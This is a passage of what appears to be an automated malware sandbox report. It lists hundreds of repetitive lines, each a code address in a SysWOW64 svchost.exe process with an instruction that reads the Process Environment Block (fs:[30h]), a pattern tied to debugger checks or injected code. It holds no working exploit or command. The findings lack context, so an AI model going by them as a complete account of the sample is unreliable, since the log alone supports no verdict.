            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03932050 mov eax, dword ptr fs:[00000030h]1_2_03932050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B6050 mov eax, dword ptr fs:[00000030h]1_2_039B6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395C073 mov eax, dword ptr fs:[00000030h]1_2_0395C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D678E mov eax, dword ptr fs:[00000030h]1_2_039D678E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039307AF mov eax, dword ptr fs:[00000030h]1_2_039307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E47A0 mov eax, dword ptr fs:[00000030h]1_2_039E47A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393C7C0 mov eax, dword ptr fs:[00000030h]1_2_0393C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B07C3 mov eax, dword ptr fs:[00000030h]1_2_039B07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039347FB mov eax, dword ptr fs:[00000030h]1_2_039347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039347FB mov eax, dword ptr fs:[00000030h]1_2_039347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039527ED mov eax, dword ptr fs:[00000030h]1_2_039527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039527ED mov eax, dword ptr fs:[00000030h]1_2_039527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039527ED mov eax, dword ptr fs:[00000030h]1_2_039527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BE7E1 mov eax, dword ptr fs:[00000030h]1_2_039BE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03930710 mov eax, dword ptr fs:[00000030h]1_2_03930710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03960710 mov eax, dword ptr fs:[00000030h]1_2_03960710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396C700 mov eax, dword ptr fs:[00000030h]1_2_0396C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396273C mov eax, dword ptr fs:[00000030h]1_2_0396273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396273C mov ecx, dword ptr fs:[00000030h]1_2_0396273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396273C mov eax, dword ptr fs:[00000030h]1_2_0396273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AC730 mov eax, dword ptr fs:[00000030h]1_2_039AC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396C720 mov eax, dword ptr fs:[00000030h]1_2_0396C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396C720 mov eax, dword ptr fs:[00000030h]1_2_0396C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03930750 mov eax, dword ptr fs:[00000030h]1_2_03930750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BE75D mov eax, dword ptr fs:[00000030h]1_2_039BE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972750 mov eax, dword ptr fs:[00000030h]1_2_03972750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972750 mov eax, dword ptr fs:[00000030h]1_2_03972750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B4755 mov eax, dword ptr fs:[00000030h]1_2_039B4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396674D mov esi, dword ptr fs:[00000030h]1_2_0396674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396674D mov eax, dword ptr fs:[00000030h]1_2_0396674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396674D mov eax, dword ptr fs:[00000030h]1_2_0396674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03938770 mov eax, dword ptr fs:[00000030h]1_2_03938770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940770 mov eax, dword ptr fs:[00000030h]1_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940770 mov eax, dword ptr fs:[00000030h]1_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940770 mov eax, dword ptr fs:[00000030h]1_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940770 mov eax, dword ptr fs:[00000030h]1_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940770 mov eax, dword ptr fs:[00000030h]1_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940770 mov eax, dword ptr fs:[00000030h]1_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940770 mov eax, dword ptr fs:[00000030h]1_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940770 mov eax, dword ptr fs:[00000030h]1_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940770 mov eax, dword ptr fs:[00000030h]1_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940770 mov eax, dword ptr fs:[00000030h]1_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940770 mov eax, dword ptr fs:[00000030h]1_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940770 mov eax, dword ptr fs:[00000030h]1_2_03940770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03934690 mov eax, dword ptr fs:[00000030h]1_2_03934690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03934690 mov eax, dword ptr fs:[00000030h]1_2_03934690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039666B0 mov eax, dword ptr fs:[00000030h]1_2_039666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396C6A6 mov eax, dword ptr fs:[00000030h]1_2_0396C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396A6C7 mov ebx, dword ptr fs:[00000030h]1_2_0396A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396A6C7 mov eax, dword ptr fs:[00000030h]1_2_0396A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AE6F2 mov eax, dword ptr fs:[00000030h]1_2_039AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AE6F2 mov eax, dword ptr fs:[00000030h]1_2_039AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AE6F2 mov eax, dword ptr fs:[00000030h]1_2_039AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AE6F2 mov eax, dword ptr fs:[00000030h]1_2_039AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B06F1 mov eax, dword ptr fs:[00000030h]1_2_039B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B06F1 mov eax, dword ptr fs:[00000030h]1_2_039B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03972619 mov eax, dword ptr fs:[00000030h]1_2_03972619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AE609 mov eax, dword ptr fs:[00000030h]1_2_039AE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394260B mov eax, dword ptr fs:[00000030h]1_2_0394260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394260B mov eax, dword ptr fs:[00000030h]1_2_0394260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394260B mov eax, dword ptr fs:[00000030h]1_2_0394260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394260B mov eax, dword ptr fs:[00000030h]1_2_0394260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394260B mov eax, dword ptr fs:[00000030h]1_2_0394260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394260B mov eax, dword ptr fs:[00000030h]1_2_0394260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394260B mov eax, dword ptr fs:[00000030h]1_2_0394260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394E627 mov eax, dword ptr fs:[00000030h]1_2_0394E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03966620 mov eax, dword ptr fs:[00000030h]1_2_03966620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03968620 mov eax, dword ptr fs:[00000030h]1_2_03968620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393262C mov eax, dword ptr fs:[00000030h]1_2_0393262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0394C640 mov eax, dword ptr fs:[00000030h]1_2_0394C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03962674 mov eax, dword ptr fs:[00000030h]1_2_03962674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F866E mov eax, dword ptr fs:[00000030h]1_2_039F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F866E mov eax, dword ptr fs:[00000030h]1_2_039F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396A660 mov eax, dword ptr fs:[00000030h]1_2_0396A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396A660 mov eax, dword ptr fs:[00000030h]1_2_0396A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396E59C mov eax, dword ptr fs:[00000030h]1_2_0396E59C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03932582 mov eax, dword ptr fs:[00000030h]1_2_03932582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03932582 mov ecx, dword ptr fs:[00000030h]1_2_03932582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03964588 mov eax, dword ptr fs:[00000030h]1_2_03964588
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039545B1 mov eax, dword ptr fs:[00000030h]1_2_039545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039545B1 mov eax, dword ptr fs:[00000030h]1_2_039545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B05A7 mov eax, dword ptr fs:[00000030h]1_2_039B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B05A7 mov eax, dword ptr fs:[00000030h]1_2_039B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B05A7 mov eax, dword ptr fs:[00000030h]1_2_039B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039365D0 mov eax, dword ptr fs:[00000030h]1_2_039365D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396A5D0 mov eax, dword ptr fs:[00000030h]1_2_0396A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396A5D0 mov eax, dword ptr fs:[00000030h]1_2_0396A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396E5CF mov eax, dword ptr fs:[00000030h]1_2_0396E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396E5CF mov eax, dword ptr fs:[00000030h]1_2_0396E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E5E7 mov eax, dword ptr fs:[00000030h]1_2_0395E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E5E7 mov eax, dword ptr fs:[00000030h]1_2_0395E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E5E7 mov eax, dword ptr fs:[00000030h]1_2_0395E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E5E7 mov eax, dword ptr fs:[00000030h]1_2_0395E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E5E7 mov eax, dword ptr fs:[00000030h]1_2_0395E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E5E7 mov eax, dword ptr fs:[00000030h]1_2_0395E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E5E7 mov eax, dword ptr fs:[00000030h]1_2_0395E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E5E7 mov eax, dword ptr fs:[00000030h]1_2_0395E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039325E0 mov eax, dword ptr fs:[00000030h]1_2_039325E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396C5ED mov eax, dword ptr fs:[00000030h]1_2_0396C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396C5ED mov eax, dword ptr fs:[00000030h]1_2_0396C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C6500 mov eax, dword ptr fs:[00000030h]1_2_039C6500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A04500 mov eax, dword ptr fs:[00000030h]1_2_03A04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A04500 mov eax, dword ptr fs:[00000030h]1_2_03A04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A04500 mov eax, dword ptr fs:[00000030h]1_2_03A04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A04500 mov eax, dword ptr fs:[00000030h]1_2_03A04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A04500 mov eax, dword ptr fs:[00000030h]1_2_03A04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A04500 mov eax, dword ptr fs:[00000030h]1_2_03A04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A04500 mov eax, dword ptr fs:[00000030h]1_2_03A04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940535 mov eax, dword ptr fs:[00000030h]1_2_03940535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940535 mov eax, dword ptr fs:[00000030h]1_2_03940535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940535 mov eax, dword ptr fs:[00000030h]1_2_03940535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940535 mov eax, dword ptr fs:[00000030h]1_2_03940535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940535 mov eax, dword ptr fs:[00000030h]1_2_03940535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940535 mov eax, dword ptr fs:[00000030h]1_2_03940535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E53E mov eax, dword ptr fs:[00000030h]1_2_0395E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E53E mov eax, dword ptr fs:[00000030h]1_2_0395E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E53E mov eax, dword ptr fs:[00000030h]1_2_0395E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E53E mov eax, dword ptr fs:[00000030h]1_2_0395E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395E53E mov eax, dword ptr fs:[00000030h]1_2_0395E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03938550 mov eax, dword ptr fs:[00000030h]1_2_03938550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03938550 mov eax, dword ptr fs:[00000030h]1_2_03938550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396656A mov eax, dword ptr fs:[00000030h]1_2_0396656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396656A mov eax, dword ptr fs:[00000030h]1_2_0396656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396656A mov eax, dword ptr fs:[00000030h]1_2_0396656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039EA49A mov eax, dword ptr fs:[00000030h]1_2_039EA49A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039644B0 mov ecx, dword ptr fs:[00000030h]1_2_039644B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BA4B0 mov eax, dword ptr fs:[00000030h]1_2_039BA4B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039364AB mov eax, dword ptr fs:[00000030h]1_2_039364AB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039304E5 mov ecx, dword ptr fs:[00000030h]1_2_039304E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03968402 mov eax, dword ptr fs:[00000030h]1_2_03968402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03968402 mov eax, dword ptr fs:[00000030h]1_2_03968402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03968402 mov eax, dword ptr fs:[00000030h]1_2_03968402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392E420 mov eax, dword ptr fs:[00000030h]1_2_0392E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392E420 mov eax, dword ptr fs:[00000030h]1_2_0392E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392E420 mov eax, dword ptr fs:[00000030h]1_2_0392E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392C427 mov eax, dword ptr fs:[00000030h]1_2_0392C427
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B6420 mov eax, dword ptr fs:[00000030h]1_2_039B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B6420 mov eax, dword ptr fs:[00000030h]1_2_039B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B6420 mov eax, dword ptr fs:[00000030h]1_2_039B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B6420 mov eax, dword ptr fs:[00000030h]1_2_039B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B6420 mov eax, dword ptr fs:[00000030h]1_2_039B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B6420 mov eax, dword ptr fs:[00000030h]1_2_039B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039B6420 mov eax, dword ptr fs:[00000030h]1_2_039B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039EA456 mov eax, dword ptr fs:[00000030h]1_2_039EA456
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392645D mov eax, dword ptr fs:[00000030h]1_2_0392645D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395245A mov eax, dword ptr fs:[00000030h]1_2_0395245A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396E443 mov eax, dword ptr fs:[00000030h]1_2_0396E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396E443 mov eax, dword ptr fs:[00000030h]1_2_0396E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396E443 mov eax, dword ptr fs:[00000030h]1_2_0396E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396E443 mov eax, dword ptr fs:[00000030h]1_2_0396E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396E443 mov eax, dword ptr fs:[00000030h]1_2_0396E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396E443 mov eax, dword ptr fs:[00000030h]1_2_0396E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396E443 mov eax, dword ptr fs:[00000030h]1_2_0396E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396E443 mov eax, dword ptr fs:[00000030h]1_2_0396E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395A470 mov eax, dword ptr fs:[00000030h]1_2_0395A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395A470 mov eax, dword ptr fs:[00000030h]1_2_0395A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395A470 mov eax, dword ptr fs:[00000030h]1_2_0395A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BC460 mov ecx, dword ptr fs:[00000030h]1_2_039BC460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940BBE mov eax, dword ptr fs:[00000030h]1_2_03940BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03940BBE mov eax, dword ptr fs:[00000030h]1_2_03940BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E4BB0 mov eax, dword ptr fs:[00000030h]1_2_039E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E4BB0 mov eax, dword ptr fs:[00000030h]1_2_039E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DEBD0 mov eax, dword ptr fs:[00000030h]1_2_039DEBD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03950BCB mov eax, dword ptr fs:[00000030h]1_2_03950BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03950BCB mov eax, dword ptr fs:[00000030h]1_2_03950BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03950BCB mov eax, dword ptr fs:[00000030h]1_2_03950BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03930BCD mov eax, dword ptr fs:[00000030h]1_2_03930BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03930BCD mov eax, dword ptr fs:[00000030h]1_2_03930BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03930BCD mov eax, dword ptr fs:[00000030h]1_2_03930BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03938BF0 mov eax, dword ptr fs:[00000030h]1_2_03938BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03938BF0 mov eax, dword ptr fs:[00000030h]1_2_03938BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03938BF0 mov eax, dword ptr fs:[00000030h]1_2_03938BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395EBFC mov eax, dword ptr fs:[00000030h]1_2_0395EBFC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BCBF0 mov eax, dword ptr fs:[00000030h]1_2_039BCBF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AEB1D mov eax, dword ptr fs:[00000030h]1_2_039AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AEB1D mov eax, dword ptr fs:[00000030h]1_2_039AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AEB1D mov eax, dword ptr fs:[00000030h]1_2_039AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AEB1D mov eax, dword ptr fs:[00000030h]1_2_039AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AEB1D mov eax, dword ptr fs:[00000030h]1_2_039AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AEB1D mov eax, dword ptr fs:[00000030h]1_2_039AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AEB1D mov eax, dword ptr fs:[00000030h]1_2_039AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AEB1D mov eax, dword ptr fs:[00000030h]1_2_039AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039AEB1D mov eax, dword ptr fs:[00000030h]1_2_039AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395EB20 mov eax, dword ptr fs:[00000030h]1_2_0395EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395EB20 mov eax, dword ptr fs:[00000030h]1_2_0395EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F8B28 mov eax, dword ptr fs:[00000030h]1_2_039F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039F8B28 mov eax, dword ptr fs:[00000030h]1_2_039F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039DEB50 mov eax, dword ptr fs:[00000030h]1_2_039DEB50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E4B4B mov eax, dword ptr fs:[00000030h]1_2_039E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039E4B4B mov eax, dword ptr fs:[00000030h]1_2_039E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C6B40 mov eax, dword ptr fs:[00000030h]1_2_039C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039C6B40 mov eax, dword ptr fs:[00000030h]1_2_039C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039FAB40 mov eax, dword ptr fs:[00000030h]1_2_039FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039D8B42 mov eax, dword ptr fs:[00000030h]1_2_039D8B42
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0392CB7E mov eax, dword ptr fs:[00000030h]1_2_0392CB7E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03968A90 mov edx, dword ptr fs:[00000030h]1_2_03968A90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393EA80 mov eax, dword ptr fs:[00000030h]1_2_0393EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393EA80 mov eax, dword ptr fs:[00000030h]1_2_0393EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393EA80 mov eax, dword ptr fs:[00000030h]1_2_0393EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393EA80 mov eax, dword ptr fs:[00000030h]1_2_0393EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393EA80 mov eax, dword ptr fs:[00000030h]1_2_0393EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393EA80 mov eax, dword ptr fs:[00000030h]1_2_0393EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393EA80 mov eax, dword ptr fs:[00000030h]1_2_0393EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393EA80 mov eax, dword ptr fs:[00000030h]1_2_0393EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0393EA80 mov eax, dword ptr fs:[00000030h]1_2_0393EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03A04A80 mov eax, dword ptr fs:[00000030h]1_2_03A04A80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03938AA0 mov eax, dword ptr fs:[00000030h]1_2_03938AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03938AA0 mov eax, dword ptr fs:[00000030h]1_2_03938AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03986AA4 mov eax, dword ptr fs:[00000030h]1_2_03986AA4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03930AD0 mov eax, dword ptr fs:[00000030h]1_2_03930AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03964AD0 mov eax, dword ptr fs:[00000030h]1_2_03964AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03964AD0 mov eax, dword ptr fs:[00000030h]1_2_03964AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03986ACC mov eax, dword ptr fs:[00000030h]1_2_03986ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03986ACC mov eax, dword ptr fs:[00000030h]1_2_03986ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03986ACC mov eax, dword ptr fs:[00000030h]1_2_03986ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396AAEE mov eax, dword ptr fs:[00000030h]1_2_0396AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396AAEE mov eax, dword ptr fs:[00000030h]1_2_0396AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_039BCA11 mov eax, dword ptr fs:[00000030h]1_2_039BCA11
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03954A35 mov eax, dword ptr fs:[00000030h]1_2_03954A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03954A35 mov eax, dword ptr fs:[00000030h]1_2_03954A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0396CA24 mov eax, dword ptr fs:[00000030h]1_2_0396CA24
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0395EA2E mov eax, dword ptr fs:[00000030h]1_2_0395EA2E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03936A50 mov eax, dword ptr fs:[00000030h]1_2_03936A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03936A50 mov eax, dword ptr fs:[00000030h]1_2_03936A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03936A50 mov eax, dword ptr fs:[00000030h]1_2_03936A50
